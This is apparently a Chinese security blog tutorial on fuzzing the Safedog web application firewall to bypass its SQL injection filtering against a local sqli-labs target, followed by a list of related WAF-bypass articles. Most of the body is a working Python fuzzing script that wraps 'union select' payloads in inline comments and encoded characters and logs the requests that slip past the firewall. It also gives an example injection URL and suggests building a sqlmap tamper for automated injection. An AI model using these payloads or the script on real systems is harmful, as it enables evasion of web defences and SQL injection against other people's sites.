FUZZ测试某狗WAF绕过
题记
Fuzz是安全测试的一种方法,也是极为重要的一种手段!当你面对waf无所适从的时候,这时候你就可以Fuzz模糊测试来绕过waf,甚至你可以发现一些意想不到的姿势!最近两天我会对fuzz测试进行介绍!主要内容是Fuzz脚本编写和Fuzz思路!如果你想,这里会有无数种姿势让你bypass!
文章目录
- 题记
- 正文
- 环境准备
- FUZZ思路
- 后记
正文
环境准备
测试靶场:sqli-libs
安全软件:某狗最新版
首先安装配置安全狗,在此之前需要安装好phpstudy,和配置sqli-libs靶场,在此便不赘述!
把http防护打开,其它防护都关掉,以免影响我们测试!
因为我们进行本地测试,需要发送大量请求!这种情况会触发狗狗的cc防护和ddos防护,所以为了我们能大量得到payload!这里我们关闭IP黑名单和爬虫黑名单!
可以看到http防护已经全开!
FUZZ思路
我们的思路其实很简单!就是利用特殊字符和数字字母,特殊编码的字符遍历组合在一起进行模糊测试!这次我们利用内联注释来进行基础来进行fuzz,首先测试一下使用内联注释会不会被狗给拦了!
语句:
http://192.168.23.149/sqli/Less-1/?id=id=1/*!union*//*!select*/1,2,3
这时候还是会被狗拦了!所以我们可以发现安全狗对一般的注入还是有一定防护能力的!
接下来贴上我们的FUZZ脚本
# ! -*- encoding:utf-8 -*-# python3
#比较全
# fuzz_zs = ['/*','*/','/*!','?','*','=','`','~','!','@','%','.','-','+','|','%00'.'%20' ,'%09', '%0a', '%0b', '%0c', '%0d' ,
# '%a0' ,'/**/']
# fuzz_sz = ['0','1','2','3','4','5','6','7','8','9']
# fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j","%0k","%0l","%0m","%0n",
# "%0o","%0p","%0q","%0r","%0s","%0t","%0u","%0v","%0w","%0x","%0y","%0z"]
import requests
#精简
fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']fuzz_sz = ['', ' ']fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]fuzz = fuzz_zs + fuzz_sz + fuzz_chheaders = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0"}url_start = "http://192.168.23.149/sqli/Less-1/?id=1"for a in fuzz:for b in fuzz:for c in fuzz:for d in fuzz:exp = "/*!union" + a + b + c + d + "select*/ 1,2,3"url = url_start + expres = requests.get(url=url, headers=headers)print("Now URL:" + url)if "Login" in res.text:print("Find Fuzz bypass:" + url)with open("H:ip.txt", 'a', encoding='utf-8') as r:r.write(url + "\n")这里我们使用精简的payload组合!因为组合起来真是太多了,我计算了一下请看图!
对!就是3个亿组合,这里才五层嵌套!我就跑了几秒!已经找到近千种bybass姿势了!
我们随便找一个!进行测试!
发现成功bypass!
接下来你可以继续手工注入!更方便的是你可以直接写一个sqlmap的tamper自动化注入~
后记
FUZZ作为一种重要的漏洞挖掘姿势!今天利用一个实例以及脚本编写对其进行介绍,这里你可以用成千上万种姿势绕过常规安全软件的软waf!下次我会就FUZZ测试流程以及FUZZ工具使用进行介绍!欢迎各位前来斧正!
FUZZ测试某狗WAF绕过相关推荐
- 文件上传安全狗waf绕过思想
本内容只做思想,因为这些已经是以前的了 上传参数名解析:明确有哪些东西能修改? Content-Disposition: 一般可更改 name: 表单参数值,不能更改 filename :文件名,可以 ...
- 文件上传绕过WAF之Fuzz测试
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件上传绕过WAF之Fuzz测试. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调: ...
- 文件上传绕过安全狗WAF实战
今天继续给大家介绍渗透测试相关知识,本文主要是文件上传绕过安全狗WAF实战. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未 ...
- XSS绕过安全狗WAF
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS绕过安全狗WAF. 一.测试环境搭建 我们使用Vmware虚拟机搭建靶场环境.在Vmware虚拟机上,安装有PHPStudy,如下所示: 然后安 ...
- WAF绕过神器 (过安全狗、智创SQL注入)
WAF绕过神器 (过安全狗.智创SQL注入) 发布时间:2013-05-12 23:10文章来源:网络文章作者:panni007 点击次数: 次 分享到: QQ空间 QQ微博 新浪微博 开心网 人人网 ...
- WAF识别软件(WAFW00F)以及WAF绕过
责任声明: 本文章仅供学习交流使用,如有利用进行非法行为 上传者不承担任何责任,使用者后果自负 WAF防护分析 什么是WAF? Web应用防护系统分为两种:软件与硬件 安全公司内部的为硬件,个人或小企 ...
- WAF绕过“小迪安全课堂笔记”信息收集,漏洞发现,漏洞利用,权限控制
WAF绕过 思维导图(全) CC 攻击与 DDOS CC WAF 绕过-信息收集之反爬虫延时代理池技术 案例 Safedog-默认拦截机制分析绕过-未开CC WAF绕过-漏洞发现之代理池指纹被动探针 ...
- WAF详解及WAF绕过
waf(web application firewall): 原理: web应用防火墙,一款集网站内容安全防护.网站资源安全防护及流量保护功能为一体的服务器工具.为用户提供实时网站安全防护,避免各类针 ...
- WAF绕过思路整理(挺全)
转载至:https://harmoc.com/secnote/waf%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF%E6%95%B4%E7%90%86.html WAF绕过思 ...
最新文章
- 图解 | 搞定分布式,程序员进阶之路
- HIve学习:Hive分区修改
- JQuery之编写弹窗
- linux设置基础软件仓库时,安装centos系统时设置基础软件仓库出错
- 揭示C语言函数调用的本质解析
- labview曲线上两点画延长线_自由泳,那些防不胜防的错误动作(上)
- long 雪花算法_深入分析mysql为什么不推荐使用uuid或者雪花id作为主键
- 如何修复计算机策略组,如何在Win10中修复损坏的组策略
- Geant4学习一:写一个简单程序
- 什么是PLC?可编程控制器的结构和工作原理介绍
- java线上CPU、内存打满处理
- UG二次开发 获取零件的中心
- KVM虚拟机 装系统 命令行
- java唯一的id_Java:唯一的10位数ID
- 交互媒体第一阶段报告
- Sea年营收百亿美元:亏损20亿美元 腾讯持股降至18.6%
- Kafka:消息格式的选择 Avro JSON XML String JavaBean
- 和程序员约会的十个理由
- idea自动下载gradle失败解决方案
- 通信原理 day8,day9:第五章:数字基带传输系统的组成;常用基带信号传输码型;数字基带信号的功率谱;无码间串扰;无码间串扰系统;预编码